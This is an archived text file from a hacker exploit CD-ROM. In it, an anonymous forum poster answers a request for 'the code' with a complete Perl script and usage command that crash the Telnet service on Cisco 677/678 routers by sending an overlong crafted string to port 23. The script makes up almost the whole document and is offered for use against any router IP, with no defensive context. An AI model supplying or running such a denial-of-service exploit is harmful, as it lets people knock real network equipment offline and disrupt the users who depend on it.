home *** CD-ROM | disk | FTP | other *** search
/ H4CK3R 14 / hacker14.iso / exploits / cisco / buffer_overflow_cisco6677.txt < prev    next >
Encoding:
Text File  |  2002-10-22  |  1.1 KB  |  35 lines

  1. Cisco 677/678 Telnet Overflow Bug (Score: 0)
  2. by Anonymous on Sun Jun 16 @ 07:22
  3.  
  4. > plz tell me how to do this AND can u plz tell me the code PLZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ 
  5. ------------- 
  6. Here is the code: 
  7. running: 
  8. perl cisco677.pl -s [IP on Ciscorouter] 
  9.  
  10. --------------------cisco677.pl------------------ 
  11. #!/usr/bin/perl 
  12.  
  13. # close your Cisco 677 up on the Telnet server! 
  14. # Made for fun only! port 23 is the Telnet server port on the router 
  15. # By DNV THX to DKW-stuff 
  16. use IO::Socket; 
  17. use Getopt::Std; 
  18. getopts('s:', \%args); 
  19. if(!defined($args{s})){&usage; } 
  20. $serv = $args{s}; 
  21. $foo = "?????????????????a~ %%%%%XX%%%%%"; $number = 30000; 
  22. $data .= $foo x $number; $EOL="\015\012"; 
  23. $remote = IO::Socket::INET->new( 
  24. Proto => "tcp", 
  25. PeerAddr => $args{s}, 
  26. PeerPort => "(23)", 
  27. ) || die("No Telnet server here! on $args{s}\n"); 
  28. $remote->autoflush(1); 
  29. print $remote "$data". $EOL; 
  30. while (){ print } 
  31. print("\nPackets Sent\n"); 
  32. sub usage {die("\n$0 -s \n\n");} 
  33. ------------------------------------------------------ 
  34.  
  35.